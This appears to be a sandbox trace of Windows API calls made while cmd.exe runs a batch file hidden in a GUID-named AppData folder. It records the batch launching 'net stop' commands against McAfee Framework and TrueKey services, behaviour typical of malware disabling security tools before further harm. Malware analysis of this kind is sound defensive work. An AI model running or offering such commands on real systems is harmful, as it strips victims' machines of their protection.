[0201.386] _wcsicmp (_String1="net", _String2="START") returned -5 [0201.386] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0201.387] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0201.387] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0201.387] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0201.387] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0201.387] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0201.387] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0201.387] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0201.387] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0201.387] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0201.387] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0201.387] SetErrorMode (uMode=0x0) returned 0x1 [0201.387] GetProcessHeap () returned 0x3e0000 [0201.387] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0201.387] GetProcessHeap () returned 0x3e0000 [0201.387] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0201.388] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.388] GetProcessHeap () returned 0x3e0000 [0201.388] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0201.388] GetProcessHeap () returned 0x3e0000 [0201.388] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0201.388] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.388] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.389] GetLastError () returned 0x2 [0201.389] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.389] GetLastError () returned 0x2 [0201.389] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.390] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.390] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.390] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.390] GetLastError () returned 0x2 [0201.391] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.391] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.391] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.392] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0201.392] SetErrorMode (uMode=0x0) returned 0x1 [0201.392] GetProcessHeap () returned 0x3e0000 [0201.392] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0201.392] GetProcessHeap () returned 0x3e0000 [0201.392] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0201.392] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.392] GetProcessHeap () returned 0x3e0000 [0201.392] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0201.392] GetProcessHeap () returned 0x3e0000 [0201.392] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0201.393] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.393] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.393] GetLastError () returned 0x2 [0201.393] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.394] GetLastError () returned 0x2 [0201.394] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.394] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0201.394] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.395] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.395] GetLastError () returned 0x2 [0201.395] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0201.395] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.396] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.396] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0201.396] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0201.396] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0201.396] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0201.396] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop McAfeeFrameworkMcAfeeFramework /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop McAfeeFrameworkMcAfeeFramework /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop McAfeeFrameworkMcAfeeFramework /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa78, dwThreadId=0xa54)) returned 1 [0201.400] CloseHandle (hObject=0x74) returned 1 [0201.400] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.400] GetProcessHeap () returned 0x3e0000 [0201.401] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.401] GetEnvironmentStringsW () returned 0x3f8408* [0201.401] GetProcessHeap () returned 0x3e0000 [0201.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.401] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.401] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0201.576] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0201.576] CloseHandle (hObject=0x78) returned 1 [0201.576] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0201.576] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0201.576] GetProcessHeap () returned 0x3e0000 [0201.576] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.576] GetEnvironmentStringsW () returned 0x3f8408* [0201.576] GetProcessHeap () returned 0x3e0000 [0201.576] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.577] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.577] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0201.577] GetProcessHeap () returned 0x3e0000 [0201.577] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.577] GetEnvironmentStringsW () returned 0x3f8408* [0201.577] GetProcessHeap () returned 0x3e0000 [0201.577] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.577] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.577] GetProcessHeap () returned 0x3e0000 [0201.577] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0201.577] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0201.577] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.577] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0201.577] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.577] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0201.578] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.578] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0201.578] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.578] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0201.578] SetConsoleInputExeNameW () returned 0x1 [0201.578] GetConsoleOutputCP () returned 0x1b5 [0201.578] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0201.578] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0201.579] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0201.579] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.579] SetFilePointer (in: hFile=0x78, lDistanceToMove=3289, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xcd9 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0201.579] GetProcessHeap () returned 0x3e0000 [0201.579] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0201.580] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.580] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xcd9 [0201.580] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xbe8, lpOverlapped=0x0) returned 1 [0201.580] SetFilePointer (in: hFile=0x78, lDistanceToMove=3310, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xcee [0201.580] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop TrueKey /y\r\norkMcAfeeFramework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 21 [0201.580] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.580] GetFileType (hFile=0x78) returned 0x1 [0201.580] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.580] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xcee [0201.580] GetProcessHeap () returned 0x3e0000 [0201.580] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0201.580] GetProcessHeap () returned 0x3e0000 [0201.580] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0201.583] _tell (_FileHandle=3) returned 3310 [0201.584] _close (_FileHandle=3) returned 0 [0201.584] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0201.584] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0201.584] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0201.584] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0201.584] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0201.584] _wcsicmp (_String1="net", _String2="CD") returned 11 [0201.584] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0201.584] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0201.584] _wcsicmp (_String1="net", _String2="REN") returned -4 [0201.584] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0201.584] _wcsicmp (_String1="net", _String2="SET") returned -5 [0201.584] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0201.584] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0201.584] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0201.584] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0201.584] _wcsicmp (_String1="net", _String2="MD") returned 1 [0201.584] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0201.584] _wcsicmp (_String1="net", _String2="RD") returned -4 [0201.584] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0201.584] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0201.584] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0201.584] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0201.584] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0201.584] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0201.584] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0201.584] _wcsicmp (_String1="net", _String2="VER") returned -8 [0201.584] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0201.584] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0201.584] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0201.584] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0201.584] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0201.584] _wcsicmp (_String1="net", _String2="START") returned -5 [0201.584] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0201.585] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0201.585] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0201.585] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0201.585] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0201.585] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0201.585] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0201.585] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0201.585] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0201.585] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0201.585] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0201.585] SetErrorMode (uMode=0x0) returned 0x1 [0201.585] GetProcessHeap () returned 0x3e0000 [0201.585] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0201.585] GetProcessHeap () returned 0x3e0000 [0201.585] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0201.586] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.586] GetProcessHeap () returned 0x3e0000 [0201.586] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0201.586] GetProcessHeap () returned 0x3e0000 [0201.586] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0201.586] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.587] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.587] GetLastError () returned 0x2 [0201.587] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.587] GetLastError () returned 0x2 [0201.588] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.588] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.588] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.588] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.589] GetLastError () returned 0x2 [0201.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.589] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.589] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.590] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0201.590] SetErrorMode (uMode=0x0) returned 0x1 [0201.590] GetProcessHeap () returned 0x3e0000 [0201.590] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0201.590] GetProcessHeap () returned 0x3e0000 [0201.590] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0201.590] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.590] GetProcessHeap () returned 0x3e0000 [0201.590] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0201.590] GetProcessHeap () returned 0x3e0000 [0201.590] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0201.591] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.591] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.591] GetLastError () returned 0x2 [0201.592] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.592] GetLastError () returned 0x2 [0201.592] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.592] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0201.593] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0201.593] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.593] GetLastError () returned 0x2 [0201.593] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0201.594] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0201.594] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.594] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0201.594] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0201.594] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0201.595] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0201.595] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop TrueKey /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop TrueKey /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop TrueKey /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa74, dwThreadId=0xa5c)) returned 1 [0201.599] CloseHandle (hObject=0x78) returned 1 [0201.599] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.599] GetProcessHeap () returned 0x3e0000 [0201.599] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.599] GetEnvironmentStringsW () returned 0x3f8408* [0201.599] GetProcessHeap () returned 0x3e0000 [0201.599] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.599] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.599] WaitForSingleObject (hHandle=0x74, 